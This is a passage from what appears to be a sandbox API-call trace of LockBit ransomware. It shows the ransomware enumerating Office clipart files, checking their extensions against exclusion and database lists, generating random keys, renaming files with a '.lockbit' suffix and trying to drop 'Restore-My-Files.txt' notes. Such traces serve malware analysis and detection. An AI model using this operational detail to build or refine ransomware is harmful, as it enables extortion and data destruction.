(lpString1="Restore-My-Files.txt", lpString2="J0296279.WMF") returned 1 [0156.938] lstrcmpiW (lpString1="ntldr", lpString2="J0296279.WMF") returned 1 [0156.938] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0296279.WMF") returned 1 [0156.938] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0296279.WMF") returned -1 [0156.938] lstrcmpiW (lpString1="autorun.inf", lpString2="J0296279.WMF") returned -1 [0156.938] lstrcmpiW (lpString1="thumbs.db", lpString2="J0296279.WMF") returned 1 [0156.938] lstrcmpiW (lpString1="iconcache.db", lpString2="J0296279.WMF") returned -1 [0156.938] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0156.938] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0296279.WMF") returned=".WMF" [0156.938] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0156.938] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0156.938] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0156.938] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0156.938] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0156.938] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0156.938] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0156.938] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0156.938] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0156.938] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0156.938] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0156.938] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0156.938] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0156.938] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0156.938] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0156.938] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0156.939] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0156.939] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0156.939] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0156.939] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0156.939] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0156.939] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0156.939] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0156.939] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0156.939] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0156.939] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0156.939] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0156.939] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0156.939] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0296279.WMF.lockbit") returned 72 [0156.939] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0296279.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0296279.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0156.941] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0156.941] malloc (_Size=0x40068) returned 0x3df0008 [0156.941] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=67726) returned 1 [0156.941] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0156.942] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0156.943] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0156.943] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0156.943] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0156.943] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0156.943] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0156.948] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0296279.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0296279.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0156.948] malloc (_Size=0xa6) returned 0x1fa2ed8 [0156.948] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0156.951] free (_Block=0x1fa2ed8) [0156.951] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0296279.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0156.951] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0156.951] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0156.951] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6613c7b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x107ec, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0296288.WMF", cAlternateFileName="")) returned 1 [0156.951] lstrcmpiW (lpString1=".", lpString2="J0296288.WMF") returned -1 [0156.951] lstrcmpiW (lpString1="..", lpString2="J0296288.WMF") returned -1 [0156.951] PathFindExtensionW (pszPath="J0296288.WMF") returned=".WMF" [0156.951] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0156.951] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0156.951] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0156.951] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0156.951] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0156.952] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0156.952] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0156.952] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0156.952] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0156.952] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0156.952] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0156.952] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0156.952] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0156.952] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0156.952] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0156.952] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0156.952] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0156.952] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0156.952] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0156.952] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0156.952] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0156.952] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0156.952] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0156.952] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0156.952] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0156.952] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0156.952] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0156.952] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0156.952] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0156.952] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0156.952] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0156.953] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0156.953] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0156.953] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0156.953] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0156.953] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0156.953] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0156.953] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0156.953] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0156.953] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0156.953] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0156.953] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0156.953] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0156.953] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0156.953] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0156.953] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0156.953] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0156.953] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0296288.WMF") returned 1 [0156.953] lstrcmpiW (lpString1="ntldr", lpString2="J0296288.WMF") returned 1 [0156.953] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0296288.WMF") returned 1 [0156.953] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0296288.WMF") returned -1 [0156.953] lstrcmpiW (lpString1="autorun.inf", lpString2="J0296288.WMF") returned -1 [0156.953] lstrcmpiW (lpString1="thumbs.db", lpString2="J0296288.WMF") returned 1 [0156.953] lstrcmpiW (lpString1="iconcache.db", lpString2="J0296288.WMF") returned -1 [0156.953] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0156.953] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0296288.WMF") returned=".WMF" [0156.953] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0156.954] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0156.954] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0156.954] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0156.954] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0156.954] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0156.954] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0156.954] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0156.954] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0156.954] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0156.954] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0156.954] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0156.954] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0156.954] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0156.954] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0156.954] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0156.954] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0156.954] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0156.954] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0156.954] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0156.954] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0156.954] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0156.954] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0156.954] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0156.954] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0156.954] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0156.954] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0156.954] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0156.955] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0296288.WMF.lockbit") returned 72 [0156.955] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0296288.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0296288.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0156.956] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0156.956] malloc (_Size=0x40068) returned 0x3df0008 [0156.956] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=67564) returned 1 [0156.956] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0156.956] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0156.957] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0156.957] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0156.957] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0156.957] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0156.957] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0156.962] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0296288.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0296288.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0156.962] malloc (_Size=0xa6) returned 0x1fa2ed8 [0156.962] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0156.965] free (_Block=0x1fa2ed8) [0156.965] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0296288.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0156.965] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0156.965] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0156.965] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6613c7b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x59ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0297229.WMF", cAlternateFileName="")) returned 1 [0156.965] lstrcmpiW (lpString1=".", lpString2="J0297229.WMF") returned -1 [0156.965] lstrcmpiW (lpString1="..", lpString2="J0297229.WMF") returned -1 [0156.965] PathFindExtensionW (pszPath="J0297229.WMF") returned=".WMF" [0156.965] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0156.965] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0156.966] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0156.966] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0156.966] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0156.966] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0156.966] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0156.966] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0156.966] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0156.966] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0156.966] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0156.966] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0156.966] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0156.966] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0156.966] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0156.966] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0156.966] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0156.966] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0156.966] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0156.966] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0156.966] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0156.966] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0156.966] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0156.966] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0156.966] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0156.966] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0156.966] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0156.966] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0156.966] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0156.966] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0156.967] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0156.967] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0156.967] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0156.967] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0156.967] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0156.967] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0156.967] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0156.967] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0156.967] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0156.967] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0156.967] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0156.967] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0156.967] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0156.967] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0156.967] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0156.967] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0156.967] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0156.967] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0297229.WMF") returned 1 [0156.967] lstrcmpiW (lpString1="ntldr", lpString2="J0297229.WMF") returned 1 [0156.967] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0297229.WMF") returned 1 [0156.967] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0297229.WMF") returned -1 [0156.967] lstrcmpiW (lpString1="autorun.inf", lpString2="J0297229.WMF") returned -1 [0156.967] lstrcmpiW (lpString1="thumbs.db", lpString2="J0297229.WMF") returned 1 [0156.967] lstrcmpiW (lpString1="iconcache.db", lpString2="J0297229.WMF") returned -1 [0156.967] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0156.967] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0297229.WMF") returned=".WMF" [0156.968] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0156.968] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0156.968] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0156.968] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0156.968] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0156.968] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0156.968] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0156.968] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0156.968] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0156.968] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0156.968] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0156.968] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0156.968] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0156.968] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0156.968] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0156.968] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0156.968] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0156.968] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0156.968] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0156.968] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0156.968] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0156.968] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0156.968] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0156.968] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0156.968] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0156.968] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0156.968] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0156.969] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0156.969] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0297229.WMF.lockbit") returned 72 [0156.969] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0297229.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0297229.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0156.970] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0156.970] malloc (_Size=0x40068) returned 0x3df0008 [0156.970] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=22990) returned 1 [0156.970] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0156.970] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0156.970] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0156.971] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0156.971] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0156.971] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0156.971] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0156.975] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0297229.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0297229.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0156.976] malloc (_Size=0xa6) returned 0x1fa2ed8 [0156.976] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0156.977] free (_Block=0x1fa2ed8) [0156.977] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0297229.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0156.977] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0156.977] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0156.977] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x566b3c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, 